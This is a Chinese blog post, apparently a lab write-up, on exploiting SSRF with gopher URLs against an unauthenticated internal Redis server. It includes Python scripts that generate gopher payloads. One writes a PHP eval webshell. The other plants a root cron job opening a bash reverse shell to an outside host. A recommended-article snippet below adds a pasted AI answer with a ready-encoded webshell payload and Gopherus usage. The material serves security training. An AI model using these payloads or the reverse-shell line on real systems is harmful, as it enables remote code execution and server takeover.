SSRF + gopher 打内网redis

最新推荐文章于 2025-09-10 09:08:36 发布
原创 最新推荐文章于 2025-09-10 09:08:36 发布 · 836 阅读 · 28 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#redis #数据库 #缓存

SSRF + gopher 打内网redis

0x01:环境搭建:

使用的是国光师傅的靶场

GitHub - sqlsec/ssrf-vuls: 国光的手把手带你用 SSRF 打穿内网靶场源码

0x02:漏洞发现:

存在SSRF漏洞

0x03:漏洞利用:

接下来读取hosts文件

发现当前机器内网IP

探测内网IP 端口

爆破出的情况:

172.72.23.21 - 80
172.72.23.22 - 80
172.72.23.23 - 80、3306
172.72.23.24 - 80
172.72.23.25 - 80
172.72.23.26 - 8080
172.72.23.27 - 6379
172.72.23.28 - 6379
172.72.23.29 - 3306

可以看到

27 28两个IP是redis默认端口6379

使用dict直接访问一下

存在未授权访问漏洞, 配合gopher协议, 直接上shell

gopher要搭配数据流来使用, 构造太复杂, 所以使用脚本来生成Payload

脚本内容如下:

import urllib.parse
​
protocol = "gopher://"
ip = "x.x.x.x"
port = "6379"
shell = "\n\n<?php eval($_POST[\"afk\"]);?>\n\n"
filename = "afk.php"
path = "/tmp"
passwd = ""
cmd = ["flushall",
     "set 1 {}".format(shell.replace(" ","${IFS}")),  
     "config set dir {}".format(path),
     "config set dbfilename {}".format(filename),
     "save",
     "quit"
    ]
if passwd:
    cmd.insert(0,"AUTH {}".format(passwd))
payload = protocol + ip + ":" + port + "/_"
def redis_format(arr):
    CRLF = "\r\n"
    redis_arr = arr.split(" ")
    cmd = ""
    cmd += "*" + str(len(redis_arr))
    for x in redis_arr:
        cmd += CRLF + "$" + str(len((x.replace("${IFS}"," ")))) + CRLF + x.replace("${IFS}"," ")
    cmd += CRLF
    return cmd
​
if __name__=="__main__":
    for x in cmd:
        payload += urllib.parse.quote(redis_format(x))
​
    # print(payload)
    print(urllib.parse.quote(payload))

全部OK

进入镜像命令:

docker exec -it 镜像id bin/bash

成功写入

0x04:计划任务反弹shell:

脚本内容换成

import urllib.parse
​
protocol = "gopher://"
ip = "172.72.23.27"
port = "6379"
shell = "\n\n * * * * * /bin/bash -i >& /dev/tcp/x.x.x.x/9999 0>&1\n\n"
filename = "root"
path = "/var/spool/cron"
passwd = ""
cmd = ["flushall",
     "config set dir {}".format(path),
     "config set dbfilename {}".format(filename),
     "set x {}".format(shell.replace(" ","${IFS}")),  
     "save"
    ]
if passwd:
    cmd.insert(0,"AUTH {}".format(passwd))
payload = protocol + ip + ":" + port + "/_"
def redis_format(arr):
    CRLF = "\r\n"
    redis_arr = arr.split(" ")
    cmd = ""
    cmd += "*" + str(len(redis_arr))
    for x in redis_arr:
        cmd += CRLF + "$" + str(len((x.replace("${IFS}"," ")))) + CRLF + x.replace("${IFS}"," ")
    cmd += CRLF
    return cmd
​
if __name__=="__main__":
    for x in cmd:
        payload += urllib.parse.quote(redis_format(x))
​
    # print(payload)
    print(urllib.parse.quote(payload))

写了一个计划任务, 反弹shell

反弹shell成功

Shadowyz.
关注
SSRF---gopher和dict打redis
unexpectedthing的博客
12-01 6902
前言 之前关于SSRFredis(redis的未授权漏洞)都没咋总结,现在总结一下。 redis简介 redis是一个key-value存储系统,是一个开源(BSD许可)的,内存中的数据结构存储系统,它可以用作数据库缓存和消息中间件。 它支持多种类型的数据结构,如 字符串(strings), 散列(hashes), 列表(lists), 集合(sets), 有序集合(sorted sets) 与范围查询, bitmaps, hyperloglogs 和 地理空间(geospatial) 索引半径查询。
ssrf漏洞攻击内网Redis复现
懂进攻知防守
07-21 1435
SSRF简介SSRF(Server-SideRequestForgery,服务端请求伪造),是攻击者让服务端发起构造的指定请求链接造成的漏洞。由于存在防火墙的防护,导致攻击者无法直接入侵内网;这时攻击者可以以服务器为跳板发起一些网络请求,从而攻击内网的应用及获取内网数据。大都是由于服务端提供了从其他服务器获取数据的功能,比如使用户从指定的URLweb应用获取图片、下载文件、读取文件内容等。.........
SSRFRedis
weixin_44843084的博客
06-06 972
SSRFRedis https://www.cnblogs.com/linuxsec/articles/11221756.html https://www.cnblogs.com/-chenxs/p/11749367.html 1.探测端口 http://xxx.xxx.xx.xx/xx/xx.php?url=http://目标:6379 如果探测到6379端口,那么可以利用http、gopher、dict这几个协议来打开放6379端口的redis服务, 原理是利用他们以目标机的身份执行对开启redis
CTFHub SSRF通关笔记6:Gopher Redis原理详解与渗透实战
最新发布
mooyuan的网络安全博客
09-10 1231
本文通过CTFHub的SSRFRedis关卡,详细讲解了利用SSRF结合Gopher协议攻击Redis服务的技术原理与实战方法。首先介绍了SSRFGopher协议和Redis在攻击链中的角色,重点解析了如何通过构造恶意Gopher请求突破内网限制实现Redis未授权访问。随后演示了使用Gopherus工具生成攻击载荷的过程,包括路径设置、WebShell内容输入及URL编码等关键步骤。最后通过蚁剑连接生成的木马文件成功获取系统flag,完整展示了从SSRF漏洞发现到实现远程代码执行的全过程。
利用 SSRFRedis 未授权访问进行内网渗透
智商不在服务区的博客
03-31 1173
在本次实验中,我们使用 Docker 环境进行测试。解压实验包,搭建docker环境。docker环境web的dockerfile主要利用代码redis服务器通过启动相关容器,初次启动失败。发现docker版本问题,删除docker版本 3,并尝试重新拉取重新启动后,环境成功搭建,获取内网 IP。我们使用抓包工具检测内网存活主机,发现172.18.0.2存在HTTP服务,并返回Go away。使用burpsuite对172.18.0.2进行端口扫描,发现6379端口返回Redis
SSRF+Redis内网渗透二
zj2084的博客
03-15 1008
需要满足Gopher的协议要求,其数据格式为:gopher://ip:port/_TCP/IP数据流,比如针对Redis的操作,协议需要gopher://127.0.0.1:6379/_开头,后面跟上基于TCP协议的原始数据包。在这一点上,Dict协议相对方便一些,但是两者有很大差别,比如dict只支持Redis的单条命令,而Gopher可以很好地支持批量命令处理,在针对需要密码登录Redis的情况下,dict也无能为力而Gopher可以很好地完成。替换后的结果如下所示,然后将前面的\r\n给删除即可。
2021-08-16 CTFer成长之路-SSRF漏洞-Gopher协议攻击(redis
热门推荐
时光隧道
08-16 5万+
生成反弹shell脚本 在burp中再进行一次url编码 将编码结果传入到web的url参数中,可以看到目录下生成了shell.php
SSRF+Redis进行内网渗透
zhuge_long的专栏
10-24 1564
gopher协议(信息查找协议),一般用来攻击redis,mysql等服务。其利用的数据格式gopher://ip:端口/_数据,数据的前面需要有_,数据一般需要进行url编码。
SSRF+Redis内网渗透一
zj2084的博客
03-15 771
因为上面的环境我们将密码给注释掉了,所以不会被密码所限制,如果有密码的话,我们只能够登录上去,如果还想继续做Redis的操作,就已经不顶事了,因为这是一个死循环,无论如何只能执行auth:admin123,而不能进行接下来的操作,这样的话,dict这种协议就没有办法啦,dict还可以登录记录那条有效的,我们可以用来爆破登录的密码。由于上面我们将密码给注释了,所以我们现在将密码的注释给删除,然后我们使用bp进行爆破密码,爆破成功,发现密码是admin123。
Redis未授权访问及配合SSRF总结
saber的博客
10-24 1579
Redis是一个开源的内存数据库,它用于存储数据,并提供高性能、可扩展性和丰富的数据结构支持。默认情况下,会绑定在,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等,这样将会将Redis服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问Redis的情况下,利用Redis自身的提供的config命令,可以进行写文件操作,并且写公匙登录。
SSRFRedis进行内网渗透
zhuge_long的专栏
12-07 1030
gopher协议(信息查找协议),一般用来攻击redis,mysql等服务。其利用的数据格式gopher://ip:端口/_数据,数据的前面需要有_,数据一般需要进行url编码。
SSRF漏洞理解进阶&SSRF+gopher内网redis、mysql、fastcgi)& SSRF相关基础概念
东隅的博客
10-25 1万+
SSRF漏洞理解进阶&SSRF+gopher内网redis、mysql、fastcgi)& SSRF相关基础概念。首先要了解几个概念:内网&外网代理curlgopher、ftp、dict伪协议file_get_contents()、 fsockopen() 、curl_exec() 等函数。
利用SSRFgopherRedis未授权(.py版)
qq_44324297的博客
07-13 463
利用SSRFgopherRedis未授权(.py版) docker,lamp
SSRF利用 Gopher 协议拓展攻击面
BerL1n
11-25 1万+
1 概述 Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多重要的作用。利用此协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。这无疑极大拓宽了 SSRF 的攻击面。 gophergopher协议支持发出GET、POST请求:可以先截获get请求包和post请求包,再构造成符合gopher协议的请求。gopher协议是s...
web渗透测试之(未授权访问漏洞redis)反弹shell SSRF结合redis结合伪协议(已更新)
盾悟
02-12 7331
http:// 主要用于探测主机存活和端口的开放情况dict:// 字典服务器协议,访问字典资源,如,dict:///ip:6739/info1探测信息有时候返回的信息比较多2发送指令3运行指令sftp://SSH文件传输协议或安全文件传输协议探测文件时上传下载的 ftp针对21端口gopher:// 分布式文档传递服务,可使用gopherus生成payloadssh基于gopher发起攻击file:/// 从文。
SSRF && Gopher && Redis && FastCGI
3569
05-26 2540
之前没尝试过 SSRFRedis,虽然是老的东西了,但是自己试一下socat : socat是一個netcat(nc)的替代產品,可以稱得上nc++。socat的特點就是在兩個流之間建立一個雙向的通道。socat的地址類型很 多,有ip, tcp, udp, ipv6,pipe,exec,system,open,proxy,openssl,等等。redis 新版本貌似开启了safemode,...
重生之我是赏金猎人(六)-强行多次FUZZ发现某厂商SSRFredis密码喷洒批量反弹Shell
weixin_44948325的博客
03-26 2884
0x00 项目背景 该系列旨在分享自己和团队在SRC、项目实战漏洞测试过程中的有趣案例,如果读者能从本项目习得一些有用的知识,那么笔者将非常荣幸。 该系列首发github:https://github.com/J0o1ey/BountyHunterInChina 本项目由M78sec维护,未经授权,文章严禁私自修改版权转载。 0x01 前言 有技术交流或渗透测试培训需求的朋友欢迎联系QQ/VX-547006660,需要代码审计、渗透测试、红蓝对抗⽹络安全相关业务可以联系我司 2000⼈⽹络安全交流群,欢迎⼤
ip限制绕过及gopherredis的利用讲解
DKPT的博客
12-05 530
gopher协议支持发出GET、POST请求:可以先截获get请求包和post请求包,再构造成符合gopher协议的请求。gopher协议是ssrf利用中一个最强大的协议(俗称万能协议)。gopher协议是一个互联网上使用的分布型的文件搜集获。
ssrf gopher例题
03-08
<think>好的,我现在需要帮用户查找关于SSRF漏洞中使用Gopher协议的例题或示例。首先,我得先确认用户的具体需求。用户提到了SSRFGopher协议,并需要相关的例题或示例,可能是在学习如何利用Gopher协议进行攻击,或者准备相关的实验环境。 首先,我需要回忆SSRF的基本概念。根据引用[3],SSRF是服务器端请求伪造,攻击者通过服务端发起请求,通常目标是内部系统。而Gopher协议是一个支持多种网络请求的协议,可以用来构造各种类型的请求,比如HTTP、FTP等,因此在SSRF中常被用来扩大攻击面。 接下来,用户需要的是具体的例题或示例。根据引用[2],Gopherus工具可以生成Gopher负载来利用SSRF,实现RCE或反向shell。所以可能需要介绍如何使用这个工具生成Payload,并结合实际的例子说明。 然后,我需要考虑是否有现成的例题结构。例如,可能有一个存在SSRF漏洞的PHP脚本,用户可以通过Gopher协议发送构造的请求到内网服务,比如Redis,执行命令。这需要具体的步骤,比如构造Redis的协议格式,编码处理,以及发送请求。 还需要注意示例的正确性,确保Payload的构造符合协议规范,比如Redis的协议使用CRLF换行,以及命令的格式是否正确。此外,可能需要提到不同环境的差异,比如是否需要URL编码,或者处理特殊字符。 另外,引用[4]提到Thinkphp5框架的远程代码执行漏洞,虽然用户的问题主要围绕SSRFGopher,但可能需要确认是否有结合框架漏洞的示例,不过根据当前问题,可能不需要深入这部分,除非用户提到的例题涉及框架。 现在,我需要整理一个具体的示例场景,比如一个存在SSRF的PHP页面,使用Gopher协议攻击内网Redis服务,写入webshell。步骤包括构造Redis命令,使用Gopherus生成Payload,发送请求,并验证结果。同时要提到工具的使用和手动构造的方法,以及注意事项如编码和协议细节。 最后,确保回答的结构清晰,分步骤说明,引用相关的资料,并在末尾生成相关问题,帮助用户进一步学习。</think>### SSRF漏洞中Gopher协议应用示例 #### 基本场景 假设存在一个PHP服务端接口,接收URL参数进行请求: ```php <?php // ssrf.php $url = $_GET['url']; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); echo curl_exec($ch); ``` 攻击目标是通过该接口访问内网Redis服务(端口6379),利用Gopher协议实现未授权命令执行。 --- #### 手动构造Gopher攻击载荷 1. **Redis命令构造** 假设目标Redis允许写入webshell: ```bash flushall set shell "<?php @eval($_GET['cmd']);?>" config set dir /var/www/html config set dbfilename shell.php save ``` 2. **协议转换** Redis使用统一请求协议格式,每条命令需添加`*{参数个数}\r\n$ {参数长度}\r\n{参数}\r\n`前缀。例如`flushall`转换为: ``` *1\r\n$8\r\nflushall\r\n ``` 3. **Gopher协议格式化** 将完整协议内容进行两次URL编码(部分环境需单次编码),最终构造: ``` gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%244%0D%0Ashell%0D%0A%2424%0D%0A%3C%3Fphp%20%40eval%28%24_GET%5B%27cmd%27%5D%29%3B%3F%3E%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A ``` 4. **发起攻击** 访问URL触发漏洞: ``` http://target.com/ssrf.php?url=[上述Gopher字符串] ``` --- #### 工具自动化生成(Gopherus) 1. **安装工具** ```bash git clone https://github.com/tarunkant/Gopherus cd Gopherus && chmod +x gopherus.py ``` 2. **生成Redis攻击载荷** ```bash ./gopherus.py --exploit redis ``` 输入命令后直接生成可直接使用的Gopher URL[^2]。 --- #### 关键注意事项 1. 协议要求严格遵循`\r\n`换行符 2. 内网服务需存在未授权访问漏洞 3. 部分WAF会过滤`gopher://`,需尝试大小写绕过或协议嵌套 4. 实际测试需根据目标环境调整编码次数[^3] ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值